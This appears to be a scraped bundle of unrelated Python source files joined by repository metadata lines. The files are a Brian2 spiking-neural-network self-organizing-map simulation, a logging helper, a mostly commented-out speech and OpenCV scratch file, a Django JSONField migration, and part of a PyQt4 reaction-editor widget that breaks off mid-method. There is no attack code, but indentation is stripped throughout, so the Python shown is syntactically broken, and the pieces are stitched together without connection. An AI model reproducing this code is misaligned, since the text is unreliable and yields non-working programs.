# inputs = np.array([0.332, 0.167, 0.946])
# inputs = np.array([0.013, 0.3401, 0.2196])
# inputs = np.array([0.829, 0.7452, 0.6728])
# print(inputs)
# N = inputs.shape[0] * bank_size
N = 20
rf = ReceptiveField(bank_size=bank_size, I_min=0.05, I_max=0.95)
# potential_input = rf.float_to_membrane_potential(inputs)
# potential_input = potential_input.flatten()
# TABLE 1
# (A) Neuronal parameters, used in (1) and (4)
time_step = 0.01;
tau_m = 10.0 * ms;
tau_m_inh = 5 * ms;
tau_m_som = 3 * ms
theta_reset_u = -0.5;
theta_reset_inh = -0.0;
theta_reset_som = 0.0
theta_u = 0.5;
theta_u_inh = 0.01;
theta_som = 0.8
# (B) Synaptic parameters, used in (2) and (3) for different synapse types
# temporal layer to som layer (u to v)
tau_r_afferent = 0.2 * ms;
tau_f_afferent = 1.0 * ms
# temporal layer (u to inh exc, u to inh inh, inh to u)
tau_r_exc = 0.4 * ms;
tau_f_exc = 2.0 * ms;
tau_r_inh = 0.2 * ms;
tau_f_inh = 1.0 * ms
tau_r_inh2u = 1.0 * ms;
tau_f_inh2u = 5.0 * ms
# som layer
tau_r_lateral = 0.1 * ms;
tau_f_lateral = 0.5 * ms
# (C) Maximum magnitudes of synaptic connection strength
w_syn_temporal_to_som_max = 2.2;
w_syn_u2inh_exc_max = 1.0;
w_syn_u2inh_inh_max = 1.0;
w_syn_inh2u_max = 100.0
w_syn_som_to_som_max = 1.0
# (D) Neighbourhood parameters, used in (6) and (7), for layer v (som)
a = 3.0;
b = 3.0;
X = 3.0;
X_ = 3.0
# (E) Learning parameter, used in (5)
# A_plus - Max synaptic strength, A_minus - max synaptic weakness; tau_plus, tau_minus - time constant of STDP
A_plus = 0.0016;
A_minus = 0.0055;
tau_plus = 11;
tau_minus = 10
# used in (7)
T = 10.0;
power_n = 2.0
# used in (6)
pi = np.pi
# size of the self-organizing map
map_size = 10
temporal_layer_neuron_equ = '''
dtime/dt = 1 / ms : 1
# inhibition connection to u layer
ds_inh2u/dt = (-s_inh2u)/tau_r_inh2u: 1
dw_inh2u/dt = (s_inh2u - w_inh2u)/tau_f_inh2u: 1
# membrane potential of u layer
dv/dt = (-v + I_ext - w_inh2u) / tau_m: 1
I_ext : 1
'''
inhibition_neuron_equ = '''
dtime/dt = 1 / ms : 1
# inhibition connection
# s_inh - internal variable
# w_inh - output potential
ds_inh/dt = (-s_inh)/tau_r_inh: 1
dw_inh/dt = (s_inh - w_inh)/tau_f_inh: 1
# excitation connection
# s_exc - internal variable
# w_exc - output potential
ds_exc/dt = (-s_exc)/tau_r_exc: 1
dw_exc/dt = (s_exc - w_exc)/tau_f_exc: 1
# diff equation membrane potential of inhibition neuron
dv/dt = (-v + w_exc - w_inh) / tau_m_inh: 1
'''
som_layer_neuron_equ = '''
dglobal_time/dt = 1 / ms : 1
dtime/dt = 1 / ms : 1
# Afferent connection (from temporal layer to som layer)
ds_afferent/dt = (-s_afferent)/tau_r_afferent: 1
dw_afferent/dt = (s_afferent - w_afferent)/tau_f_afferent: 1
# lateral connection
ds_lateral/dt = (-s_lateral)/tau_r_lateral: 1
dw_lateral/dt = (s_lateral - w_lateral)/tau_f_lateral: 1
# membrane potential of u layer
dv/dt = (-v + w_lateral + w_afferent) / tau_m_som: 1
'''
temporal_layer = NeuronGroup(N, temporal_layer_neuron_equ, threshold='v>theta_u', method=diff_method,
reset='''v = theta_reset_u; time = 0''')
# temporal_layer.I_ext = potential_input
# inhibition neuron
inhibition_neuron = NeuronGroup(1, inhibition_neuron_equ, threshold='v>theta_u_inh', method=diff_method,
reset='''v = theta_reset_inh; time = 0''')
# self-organizing layer
som_layer = NeuronGroup(map_size * map_size, som_layer_neuron_equ, threshold='v>theta_som', method=diff_method,
reset='''v = theta_reset_som; time = 0''')
# v to inh neuron, excitation connection
u2inh_excitation = Synapses(temporal_layer, target=inhibition_neuron, method=diff_method,
on_pre='''
s_exc += w_syn
A_pre = (- w_syn) * A_minus * (1 - 1/tau_minus) ** time_post
w_syn = clip(w_syn + plasticity * A_pre, 0, w_syn_u2inh_exc_max)
''',
on_post='''
A_post = exp(-w_syn) * A_plus * (1 - 1/tau_plus) ** time_pre
w_syn = clip(w_syn + plasticity * A_post, 0, w_syn_u2inh_exc_max)
''',
model='''
w_syn : 1 # synaptic weight / synapse efficacy
plasticity : boolean (shared)
''')
u2inh_excitation.connect(i=np.arange(N), j=0)
u2inh_excitation.w_syn = 'rand() * w_syn_u2inh_exc_max'
# v to inh neuron, inhibition connection
u2inh_inhibition = Synapses(temporal_layer, target=inhibition_neuron, method=diff_method,
on_pre='''
s_inh += w_syn
A_pre = (- w_syn) * A_minus * (1 - 1/tau_minus) * time_post
w_syn = clip(w_syn + plasticity * A_pre, 0, w_syn_u2inh_inh_max)
''',
on_post='''
A_post = exp(-w_syn) * A_plus * (1 - 1/tau_plus) * time_pre
w_syn = clip(w_syn + plasticity * A_post, 0, w_syn_u2inh_inh_max)
''',
model='''
w_syn : 1 # synaptic weight / synapse efficacy
plasticity : boolean (shared)
''')
u2inh_inhibition.connect(i=np.arange(N), j=0)
u2inh_inhibition.w_syn = 'rand() * w_syn_u2inh_inh_max'
# inh neuron to v, inhibition connection
inh2u_inhibition = Synapses(inhibition_neuron, target=temporal_layer, method=diff_method,
on_pre='''
s_inh2u += w_syn
A_pre = (- w_syn) * A_minus * (1 - 1/tau_minus) * time_post
w_syn = clip(w_syn + plasticity * A_pre, 0, w_syn_inh2u_max)
''',
on_post='''
A_post = exp(-w_syn) * A_plus * (1 - 1/tau_plus) * time_pre
w_syn = clip(w_syn + plasticity * A_post, 0, w_syn_inh2u_max)
''',
model='''
w_syn : 1 # synaptic weight / synapse efficacy
plasticity : boolean (shared)
''')
inh2u_inhibition.connect(i=0, j=np.arange(N))
# inh2u_inhibition.w_syn = 'rand() * w_syn_inh2u_max'
inh2u_inhibition.w_syn = 0.5 * w_syn_inh2u_max
# som lateral connection
som_synapse = Synapses(som_layer, target=som_layer, method=diff_method,
on_pre='''
radius = X - (X - X_)/(1+(2**0.5 - 1)*((global_time/T)**(2 * power_n)))
y_pre = floor(i / map_size)
x_pre = i - y_pre * map_size
y_post = floor(j/map_size)
x_post = j - y_post * map_size
dist = (x_post - x_pre)**2 + (y_post - y_pre)**2
G1 = (1 + a) * exp(- dist/(radius**2)) / (2 * pi * radius**2)
G2 = a * exp(- dist/(b * radius)**2) / (2 * pi * (b * radius)**2)
w_syn = clip(G1 + G2, 0, w_syn_som_to_som_max)
s_lateral += w_syn
''',
on_post='''
''',
model='''
w_syn : 1 # synaptic weight / synapse efficacy
''')
som_synapse.connect(condition='i!=j')
# som afferent connection
temporal_to_som_synapse = Synapses(temporal_layer, target=som_layer, method=diff_method,
on_pre='''
s_afferent += w_syn
A_pre = (- w_syn) * A_minus * (1 - 1/tau_minus) ** time_post
w_syn = clip(w_syn + plasticity * A_pre, 0, w_syn_temporal_to_som_max)
''',
on_post='''
A_post = exp(-w_syn) * A_plus * (1 - 1/tau_plus) * time_pre
w_syn = clip(w_syn + plasticity * A_post, 0, w_syn_temporal_to_som_max)
''',
model='''
w_syn : 1 # synaptic weight / synapse efficacy
plasticity : boolean (shared)
''')
temporal_to_som_synapse.connect()
temporal_to_som_synapse.w_syn = np.random.randint(low=40000, high=60000, size=N*map_size*map_size) \
* w_syn_temporal_to_som_max / 100000.0
# Visualization
som_spike_mon = SpikeMonitor(som_layer)
u_spike_mon = SpikeMonitor(temporal_layer)
# u_state_mon_v = StateMonitor(temporal_layer, 'v', record=True)
# u_state_mon_time = StateMonitor(temporal_layer, 'time', record=True)
# u_state_mon_w = StateMonitor(temporal_layer, 'w_inh2u', record=True)
inh_spike_mon = SpikeMonitor(inhibition_neuron)
# inh_state_mon = StateMonitor(inhibition_neuron, 'v', record=True)
# w_exc_neu_state = StateMonitor(inhibition_neuron, 'w_exc', record=True)
# w_inh_neu_state = StateMonitor(inhibition_neuron, 'w_inh', record=True)
#
# w_syn_u2inh_exc = StateMonitor(u2inh_excitation, 'w_syn', record=True)
defaultclock.dt = time_step * ms
step = 2
plasticity_state = False
u2inh_excitation.plasticity = plasticity_state
u2inh_inhibition.plasticity = plasticity_state
inh2u_inhibition.plasticity = plasticity_state
temporal_to_som_synapse.plasticity = True # plasticity_state
# simulation_time = 200
# run(simulation_time * ms, report='text')
# weight visualization
# simulation
simulation_time = 50
attempts = 5
dataset = ArtificialDataSet(500, int(N/10))
dataset = dataset.generate_set()
np.savetxt('dataset.txt', dataset, delimiter=';')
plt.scatter(dataset[:, 0], dataset[:, 1], s=5)
plt.show()
net_model = Network(collect())
net_model.store()
for vector in dataset:
for it in range(attempts):
net_model.restore()
print("Input vector: {0}, attempt: {1}".format(vector, it))
potential_input = rf.float_to_membrane_potential(vector)
potential_input = potential_input.flatten()
temporal_layer.I_ext = potential_input
net_model.run(simulation_time * ms, report='text')
net_model.store()
# visual
app = QtGui.QApplication([])
win = pg.GraphicsWindow(title="som")
win.resize(1000, 600)
win.setWindowTitle('brain')
# Enable antialiasing for prettier plots
pg.setConfigOptions(antialias=True)
p1 = win.addPlot(title="Region Selection")
p1.plot(u_spike_mon.t / ms, u_spike_mon.i[:], pen=None, symbol='o',
symbolPen=None, symbolSize=5, symbolBrush=(255, 255, 255, 255))
p1.showGrid(x=True, y=True)
lr = pg.LinearRegionItem([0, simulation_time])
lr.setZValue(0)
p1.addItem(lr)
p2 = win.addPlot(title="Zoom on selected region")
p2.plot(u_spike_mon.t / ms, u_spike_mon.i[:], pen=None, symbol='o',
symbolPen=None, symbolSize=5, symbolBrush=(255, 255, 255, 255))
p2.showGrid(x=True, y=True)
def updatePlot():
p2.setXRange(*lr.getRegion(), padding=0)
def updateRegion():
lr.setRegion(p2.getViewBox().viewRange()[0])
lr.sigRegionChanged.connect(updatePlot)
p2.sigXRangeChanged.connect(updateRegion)
updatePlot()
win.nextRow()
p3 = win.addPlot(title="Region Selection")
p3.plot(som_spike_mon.t / ms, som_spike_mon.i[:], pen=None, symbol='o',
symbolPen=None, symbolSize=5, symbolBrush=(255, 255, 255, 255))
p3.showGrid(x=True, y=True)
lr1 = pg.LinearRegionItem([0, 10])
lr1.setZValue(0)
p3.addItem(lr1)
p4 = win.addPlot(title="Zoom on selected region")
p4.plot(som_spike_mon.t / ms, som_spike_mon.i[:], pen=None, symbol='o',
symbolPen=None, symbolSize=5, symbolBrush=(255, 255, 255, 255))
p4.showGrid(x=True, y=True)
def updatePlot2():
p4.setXRange(*lr1.getRegion(), padding=0)
def updateRegion2():
lr1.setRegion(p4.getViewBox().viewRange()[0])
lr1.sigRegionChanged.connect(updatePlot2)
p4.sigXRangeChanged.connect(updateRegion2)
updatePlot2()
u2som_syn_shape = temporal_to_som_synapse.w_syn[:].shape
picture = temporal_to_som_synapse.w_syn[:].reshape(N, int(u2som_syn_shape[0] / N))
np.savetxt('weights.txt', picture, delimiter=';')
win2 = QtGui.QMainWindow()
win2.resize(800, 800)
imv = pg.ImageView()
win2.setCentralWidget(imv)
win2.show()
win2.setWindowTitle("SOM weights")
imv.setImage(picture)
# subplot(421)
# # subplot(111)
# title("Temporal layer spikes")
# plot(u_spike_mon.t / ms, u_spike_mon.i, '.k')
# xlabel('Time (ms)')
# ylabel('Neuron index')
# grid(True)
# xticks(np.arange(0.0, simulation_time + step, step))
# yticks(np.arange(-1, N + 1, 1))
#
# # show()
#
# subplot(422)
# title("Inhibition neuron spikes")
# plot(inh_spike_mon.t / ms, inh_spike_mon.i, '.k')
# xlabel('Time (ms)')
# ylabel('Neuron index')
# grid(True)
# xticks(np.arange(0.0, simulation_time + step, step))
# yticks(np.arange(-1, 1, 1))
#
# subplot(423)
# title("u membrane potential")
# for item in u_state_mon_v:
# plot(u_state_mon_v.t / ms, item.v)
# # plot(u_state_mon_v.t / ms, u_state_mon_v[0].v)
# xlabel('Time (ms)')
# ylabel('Potential')
# xticks(np.arange(0.0, simulation_time + step, step))
#
# subplot(424)
# title("Inhibition neuron membrane potential")
# plot(inh_state_mon.t / ms, inh_state_mon[0].v)
# xlabel('Time (ms)')
# ylabel('Potential')
# xticks(np.arange(0.0, simulation_time + step, step))
#
# subplot(425)
# title("Excitation/inhibition interaction")
# plot(w_exc_neu_state.t / ms, w_exc_neu_state[0].w_exc, w_exc_neu_state.t / ms, w_inh_neu_state[0].w_inh,
# w_exc_neu_state.t / ms, w_exc_neu_state[0].w_exc - w_inh_neu_state[0].w_inh)
# xlabel('Time (ms)')
# ylabel('Potential')
# xticks(np.arange(0.0, simulation_time + step, step))
#
# subplot(426)
# title("Inhibition to u potential")
# plot(u_state_mon_w.t / ms, u_state_mon_w[0].w_inh2u)
# xlabel('Time (ms)')
# ylabel('Potential')
# xticks(np.arange(0.0, simulation_time + step, step))
#
# subplot(427)
# title("Synaptic Weight")
# for item in w_syn_u2inh_exc:
# plot(w_syn_u2inh_exc.t / ms, item.w_syn)
# xlabel('Time (ms)')
# ylabel('Potential')
# xticks(np.arange(0.0, simulation_time + step, step))
# yticks(np.arange(-0.1, 1.1, 0.1))
#
# subplot(428)
# title("Synaptic time pre spike")
# for item in u_state_mon_time:
# plot(w_syn_u2inh_exc.t / ms, item.time)
# xlabel('Time (ms)')
# ylabel('Potential')
# xticks(np.arange(0.0, simulation_time + step, step))
#
# show()
#
# # subplot(111)
# title("Som layer spikes")
# plot(som_spike_mon.t / ms, som_spike_mon.i, '.k')
# xlabel('Time (ms)')
# ylabel('Neuron index')
# grid(True)
# xticks(np.arange(0.0, simulation_time + step, step))
# yticks(np.arange(-1, map_size * map_size + 1, 1))
#
# show()
if __name__ == '__main__':
import sys
if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
QtGui.QApplication.instance().exec_()
| mit | 4,091,960,593,132,690,000 | 38.04 | 115 | 0.512942 | false |
alexrudy/Cauldron | Cauldron/logger.py | 1 | 1395 | # -*- coding: utf-8 -*-
"""
A useful subclass of logger for more fine-grained messaging.
"""
import logging
import weakref
__all__ = ['KeywordMessageFilter']
class Logger(logging.getLoggerClass()):
"""A basic subclass of logger with some useful items."""
def getChild(self, suffix):
"""Get a child logger."""
return logging.getLogger("{0}.{1}".format(self.name, suffix))
def msg(self, msg, *args, **kwargs):
"""Messaging-level logging."""
if self.isEnabledFor(5):
self._log(5, msg, args, **kwargs)
def trace(self, msg, *args, **kwargs):
"""Trace-level logging."""
if self.isEnabledFor(1):
self._log(1, msg, args, **kwargs)
logging.setLoggerClass(Logger)
class KeywordMessageFilter(logging.Filter):
def __init__(self, keyword):
"""Filter using a keyword."""
logging.Filter.__init__(self)
self._keyword_name = keyword.full_name
self._keyword = weakref.ref(keyword)
def filter(self, record):
"""Filter by applying keyword names."""
record.keyword_name = self._keyword_name
keyword = self._keyword()
if keyword is not None:
record.keyword = repr(keyword)
else:
record.keyword = "<MissingKeyword '{0}'>".format(self._keyword_name)
return True
| bsd-3-clause | -8,061,825,739,172,878,000 | 26.92 | 80 | 0.581362 | false |
sprtkd/OpenHmnD | object/tst.py | 1 | 3754 | # -*- coding: utf-8 -*-
"""
Created on Tue Jul 11 09:29:01 2017
@author: Punyajoy Saha
"""
#!/usr/bin/env python
from pocketsphinx.pocketsphinx import *
from sphinxbase.sphinxbase import *
#
#import speech2
#
## say() speaks out loud.
#speech2.say("I am speaking out loud.")
#
## input() waits for user input. The prompt text is optional.
##spoken_text = speech2.input("Say something, user!")
##print ("You said: %s" % spoken_text)
#
## You can limit user input to a set of phrases.
#spoken_text = speech2.input("Are you there, user?", ["Yes", "No", "Shut up, computer."])
#print ("You said: %s" % spoken_text)
#
## If you don't want to wait for input, you can use listenfor() to run a callback
## every time a specific phrase is heard. Meanwhile your program can move on to other tasks.
#def L1callback(phrase, listener):
# print ("Heard the phrase: %s" % phrase)
## listenfor() returns a Listener object with islistening() and stoplistening() methods.
#listener1 = speech2.listenfor(["any of", "these will", "match"], L1callback)
#
## You can listen for multiple things at once, doing different things for each.
#def L2callback(phrase, listener):
# print ("Another phrase: %s" % phrase)
#listener2 = speech2.listenfor(["good morning Michael"], L2callback)
#
## If you don't have a specific set of phrases in mind, listenforanything() will
## run a callback every time anything is heard that doesn't match another Listener.
#def L3callback(phrase, listener):
# speech2.say(phrase) # repeat it back
# if phrase == "stop now please":
# # The listener returned by listenfor() and listenforanything()
# # is also passed to the callback.
# listener.stoplistening()
#listener3 = speech2.listenforanything(L3callback)
#
## All callbacks get automatically executed on a single separate thread.
## Meanwhile, you can just do whatever with your program, or sleep.
## As long as your main program is running code, Listeners will keep listening.
#
#import time
#while listener3.islistening(): # till "stop now please" is heard
# time.sleep(1)
#
#assert speech2.islistening() # to at least one thing
#print ("Dictation is now stopped. listeners 1 and 2 are still going.")
#
#listener1.stoplistening()
#print ("Now only listener 2 is going")
#
## Listen with listener2 for a while more, then turn it off.
#time.sleep(30)
#
#speech2.stoplistening() # stop all remaining listeners
#assert not speech2.islistening()
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#print ('item {\n'+' name: "my"'+' name: "my"')
#print (' name: "my"')
#print (' name: "my"')
#print ('}')
#
#import cv2
#import numpy as np
#import random
#roi=cv2.imread('img2.png')
#hsv_roi = cv2.cvtColor(roi, cv2.COLOR_BGR2HSV)
#cv2.imwrite('imghsv.png',hsv_roi)
#x_max=hsv_roi.shape[0]
#y_max=hsv_roi.shape[1]
#y_10=int(y_max/20)
#x_10=int(x_max/20)
#a=np.zeros((5,3),dtype='uint8')
#x=random.sample(range(int(x_max/2-20),int(x_max/2+20)),5)
#y=random.sample(range(int(y_max/2-10),int(y_max/2+10)),5)
#
#for i in range(0,a.shape[0]):
# a[i,0]=hsv_roi[int(x[i]),int(y[i]),0]
# a[i,1]=hsv_roi[int(x[i]),int(y[i]),1]
# a[i,2]=hsv_roi[int(x[i]),int(y[i]),2]
#max_0=np.max(a[:,0])
#max_1=np.max(a[:,1])
#max_2=np.max(a[:,2])
#min_0=np.min(a[:,0])
#min_1=np.min(a[:,1])
#min_2=np.min(a[:,2])
#
#
#mask = cv2.inRange(hsv_roi, np.array((min_0, min_1,min_2)), np.array((max_0,max_1,max_2)))
#cv2.imwrite('mask.png',mask)
#roi_hist = cv2.calcHist([hsv_roi],[0],mask,[180],[0,180])
#cv2.normalize(roi_hist,roi_hist,0,255,cv2.NORM_MINMAX)
#term_crit = ( cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 1 )
| mit | 6,885,824,817,186,783,000 | 23.889655 | 93 | 0.641982 | false |
jrief/djangocms-cascade | cmsplugin_cascade/migrations/0029_json_field.py | 1 | 2323 | # Generated by Django 3.1.5 on 2021-01-28 15:52
from django.db import migrations, models
def backwards(apps, schema_editor):
print("Migration backward will not restore your `JSONField`s to `CharField`s.")
class Migration(migrations.Migration):
dependencies = [
('cmsplugin_cascade', '0028_cascade_clipboard'),
]
operations = [
migrations.AlterField(
model_name='cascadeelement',
name='glossary',
field=models.JSONField(blank=True, default=dict),
),
migrations.AlterField(
model_name='cascadeclipboard',
name='data',
field=models.JSONField(blank=True, default=dict, null=True),
),
migrations.AlterField(
model_name='cascadepage',
name='glossary',
field=models.JSONField(blank=True, default=dict, help_text='Store for arbitrary page data.'),
),
migrations.AlterField(
model_name='cascadepage',
name='settings',
field=models.JSONField(blank=True, default=dict, help_text='User editable settings for this page.'),
),
migrations.AlterField(
model_name='iconfont',
name='config_data',
field=models.JSONField(),
),
migrations.AlterField(
model_name='inlinecascadeelement',
name='glossary',
field=models.JSONField(blank=True, default=dict),
),
migrations.AlterField(
model_name='pluginextrafields',
name='css_classes',
field=models.JSONField(blank=True, default=dict, null=True),
),
migrations.AlterField(
model_name='pluginextrafields',
name='inline_styles',
field=models.JSONField(blank=True, default=dict, null=True),
),
migrations.AlterField(
model_name='sharedglossary',
name='glossary',
field=models.JSONField(blank=True, default=dict, null=True),
),
migrations.AlterField(
model_name='sortableinlinecascadeelement',
name='glossary',
field=models.JSONField(blank=True, default=dict),
),
migrations.RunPython(migrations.RunPython.noop, reverse_code=backwards),
]
| mit | -3,055,507,169,678,262,000 | 33.161765 | 112 | 0.587602 | false |
SystemsBioinformatics/cbmpy | cbmpy/CBQt4.py | 1 | 32405 | """
CBMPy: CBQt4 module
===================
Constraint Based Modelling in Python (http://pysces.sourceforge.net/getNewReaction)
Copyright (C) 2009-2018 Brett G. Olivier, VU University Amsterdam, Amsterdam, The Netherlands
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>
Author: Brett G. Olivier
Contact email: [email protected]
Last edit: $Author: bgoli $ ($Id: CBQt4.py 710 2020-04-27 14:22:34Z bgoli $)
"""
# preparing for Python 3 port
from __future__ import division, print_function
from __future__ import absolute_import
#from __future__ import unicode_literals
import os
import time
import random
import math
import re
import webbrowser
import urllib2
from .CBCommon import pp_chemicalFormula
from .CBModel import Reaction as CBMReaction
HAVE_QT4 = False
try:
import PyQt4
from PyQt4 import QtCore, QtGui, QtSvg
from PyQt4.QtWebKit import QGraphicsWebView
HAVE_QT4 = True
print('Qt4 GUI tools available')
except ImportError as ex:
print('\nQt4 GUI tools not available.')
print(ex)
class ReactionCreator(QtGui.QWidget):
#_fba = None
_mlist = None
_rlist = None
_flist = None
_newSubs = None
_newProds = None
_fixColour = None
_errColour = None
_goodColour = None
_cfdict = None
_cndict = None
_ccdict = None
IGNORECHECK = False
ISBALANCED = True
NewReaction = None
_Blower = '-inf'
_Bupper = 'inf'
def __init__(self, rlist, mlist, flist, cfdict, cndict, ccdict):
super(ReactionCreator, self).__init__()
self.mousePos = self.cursor().pos()
rlist.sort()
mlist.sort()
flist.sort()
self._rlist = rlist
self._mlist = mlist
self._flist = flist
self._cfdict = cfdict
self._cndict = cndict
self._ccdict = ccdict
self._newSubs = []
self._newProds = []
self._fixColour = QtGui.QColor(0, 0, 153, alpha=255)
self._errColour = QtGui.QColor(255, 0, 0, alpha=255)
self._goodColour = QtGui.QColor(0, 100, 0, alpha=255)
self.initUI()
def addSubstrate(self, coeff, sid):
self.tblSub.insertRow(self.tblSubRow)
self.tblSub.setItem(self.tblSubRow, 0, QtGui.QTableWidgetItem('{}'.format(coeff)))
self.tblSub.setItem(self.tblSubRow, 1, QtGui.QTableWidgetItem('{}'.format(sid)))
CF = 'None'
if sid in self._cfdict:
CF = self._cfdict[sid]
self.tblSub.item(self.tblSubRow, 1).setToolTip(CF)
if sid in self._flist:
self.tblSub.item(self.tblSubRow, 1).setForeground(self._fixColour)
self.tblSub.item(self.tblSubRow, 0).setTextAlignment(QtCore.Qt.AlignCenter)
self.tblSubRow += 1
def addSelectedSubstrates(self):
self.IGNORECHECK = True
items = [str(it_.text()) for it_ in self.lstSub.selectedItems()]
self.setFocus(PyQt4.QtCore.Qt.OtherFocusReason)
# print(items)
for i_ in items:
if i_ not in self._newSubs:
self.addSubstrate(1, i_)
self._newSubs.append(i_)
self.IGNORECHECK = False
self.statusBar.showMessage('Substrates(s) added')
self.checkBalance()
def addProduct(self, coeff, sid):
self.tblProd.insertRow(self.tblProdRow)
self.tblProd.setItem(self.tblProdRow, 0, QtGui.QTableWidgetItem('{}'.format(coeff)))
self.tblProd.setItem(self.tblProdRow, 1, QtGui.QTableWidgetItem('{}'.format(sid)))
CF = 'None'
if sid in self._cfdict:
CF = self._cfdict[sid]
self.tblProd.item(self.tblProdRow, 1).setToolTip(CF)
if sid in self._flist:
self.tblProd.item(self.tblProdRow, 1).setForeground(self._fixColour)
self.tblProd.item(self.tblProdRow, 0).setTextAlignment(QtCore.Qt.AlignCenter)
self.tblProdRow += 1
def addSelectedProducts(self):
self.IGNORECHECK = True
items = [str(it_.text()) for it_ in self.lstProd.selectedItems()]
self.setFocus(PyQt4.QtCore.Qt.OtherFocusReason)
# print(items)
for i_ in items:
if i_ not in self._newProds:
self.addProduct(1, i_)
self._newProds.append(i_)
self.IGNORECHECK = False
self.statusBar.showMessage('Product(s) added')
self.checkBalance()
# def keyPressEvent(self, event):
#print('KeyPress key: {}'.format(str(event.key())))
# if event.key() == 16777223:
#print('You pressed the delete key')
def deleteSubstrates(self):
self.deleteReagents('substrate')
def deleteProducts(self):
self.deleteReagents('product')
def deleteAllSubstrates(self):
self.tblSub.clear()
for r_ in range(self.tblSubRow - 1, -1, -1):
self.tblSub.removeRow(r_)
self.tblSubRow = 0
self.checkBalance()
def deleteAllProducts(self):
self.tblProd.clear()
for r_ in range(self.tblProdRow - 1, -1, -1):
self.tblProd.removeRow(r_)
self.tblProdRow = 0
self.checkBalance()
def deleteReagents(self, reagentType):
selected = None
PRODACTIVE = False
SUBACTIVE = False
self.IGNORECHECK = True
if reagentType == 'substrate':
selected = [(it_.row(), it_.column()) for it_ in self.tblSub.selectedItems()]
SUBACTIVE = True
elif reagentType == 'product':
selected = [(it_.row(), it_.column()) for it_ in self.tblProd.selectedItems()]
PRODACTIVE = True
if selected != None:
deleteRow = []
if len(selected) == 2:
if selected[0][0] == selected[1][0]:
if selected[0][1] + 1 == selected[1][1]:
deleteRow.append(selected[0][0])
elif len(selected) > 2:
for it_ in range(0, len(selected), 2):
if selected[it_][1] == selected[it_ + 1][1]:
if selected[it_][0] + 1 == selected[it_ + 1][0]:
if selected[it_][0] not in deleteRow:
deleteRow.append(selected[it_][0])
if selected[it_][0] + 1 not in deleteRow:
deleteRow.append(selected[it_][0] + 1)
deleteRow.sort()
for d_ in range(len(deleteRow) - 1, -1, -1):
if SUBACTIVE:
print('Deleting Sub table row: {}'.format(deleteRow[d_]))
self.statusBar.showMessage('Substrate(s) deleted')
# print(self._newSubs)
#print(str(self.tblSub.item(d_, 1).text()))
self._newSubs.pop(self._newSubs.index(str(self.tblSub.item(d_, 1).text())))
self.tblSub.removeRow(deleteRow[d_])
self.tblSubRow -= 1
elif PRODACTIVE:
print('Deleting Prod table row: {}'.format(deleteRow[d_]))
self.statusBar.showMessage('Product(s) deleted')
# print(self._newProds)
#print(str(self.tblProd.item(d_, 1).text()))
self._newProds.pop(self._newProds.index(str(self.tblProd.item(d_, 1).text())))
self.tblProd.removeRow(deleteRow[d_])
self.tblProdRow -= 1
self.IGNORECHECK = False
self.checkBalance()
def checkBalance(self):
if self.IGNORECHECK:
return
output = {}
left = {}
right = {}
for r_ in range(self.tblSubRow):
sid = str(self.tblSub.item(r_, 1).text())
scoef = float(str(self.tblSub.item(r_, 0).text()))
# print scoef
if sid in self._cfdict:
cf = self._cfdict[sid]
if cf not in [None, 'None', '', ' ']:
cfl = pp_chemicalFormula.parseString(cf).asList()
else:
cfl = []
# print sid, cf, cfl
for e_ in cfl:
if e_[0] in output:
output[e_[0]] = output[e_[0]] + -scoef * float(e_[1])
# print scoef*float(e_[1])
else:
output[e_[0]] = -scoef * float(e_[1])
# print scoef*float(e_[1])
if e_[0] in left:
left[e_[0]] = left[e_[0]] + scoef * float(e_[1])
else:
left[e_[0]] = scoef * float(e_[1])
for r_ in range(self.tblProdRow):
sid = str(self.tblProd.item(r_, 1).text())
pcoef = float(str(self.tblProd.item(r_, 0).text()))
# print pcoef, type(pcoef)
if sid in self._cfdict:
cf = self._cfdict[sid]
if cf not in [None, 'None', '', ' ']:
cfl = pp_chemicalFormula.parseString(cf).asList()
else:
cfl = []
# print sid, cf, cfl
for e_ in cfl:
if e_[0] in output:
#print -pcoef*float(e_[1])
output[e_[0]] = output[e_[0]] + pcoef * float(e_[1])
else:
#print -pcoef*float(e_[1])
output[e_[0]] = pcoef * float(e_[1])
if e_[0] in right:
#print -pcoef*float(e_[1])
right[e_[0]] = right[e_[0]] + pcoef * float(e_[1])
else:
#print -pcoef*float(e_[1])
right[e_[0]] = pcoef * float(e_[1])
# print output
self.updateBalance(output, left, right)
# self.txtBal.setText(str(output))
def updateBalance(self, bdict, left, right):
colHead = []
keys = list(bdict)
if self.tblBalCol > 0:
for c_ in range(self.tblBalCol - 1, -1, -1):
self.tblBal.removeColumn(c_)
self.tblBalCol = 0
self.ISBALANCED = True
for k_ in range(len(keys)):
if not keys[k_] in left:
left[keys[k_]] = 'None'
if not keys[k_] in right:
right[keys[k_]] = 'None'
self.tblBalCol += 1
self.tblBal.insertColumn(k_)
self.tblBal.setItem(0, k_, QtGui.QTableWidgetItem('{}'.format(abs(bdict[keys[k_]]))))
self.tblBal.setItem(1, k_, QtGui.QTableWidgetItem('{}'.format(left[keys[k_]])))
self.tblBal.setItem(2, k_, QtGui.QTableWidgetItem('{}'.format(right[keys[k_]])))
self.tblBal.item(0, k_).setTextAlignment(QtCore.Qt.AlignCenter)
if k_ == 0:
boldFont = self.tblBal.item(0, k_).font()
boldFont.setBold(True)
self.tblBal.item(0, k_).setFont(boldFont)
self.tblBal.item(1, k_).setTextAlignment(QtCore.Qt.AlignCenter)
self.tblBal.item(2, k_).setTextAlignment(QtCore.Qt.AlignCenter)
if bdict[keys[k_]] != 0.0:
self.ISBALANCED = False
self.tblBal.item(0, k_).setForeground(self._errColour)
else:
self.tblBal.item(0, k_).setForeground(self._goodColour)
self.tblBal.setHorizontalHeaderLabels(QtCore.QStringList(keys))
def showErrorMessage(self, errorMsg, title="Reaction Creator"):
QtGui.QMessageBox.critical(None, title,
errorMsg,
QtGui.QMessageBox.Ok | QtGui.QMessageBox.Default,
QtGui.QMessageBox.NoButton)
self.statusBar.showMessage(errorMsg)
def getNewReaction(self):
reversible = self.btReverse.isChecked()
if not reversible and self._Blower == '-inf':
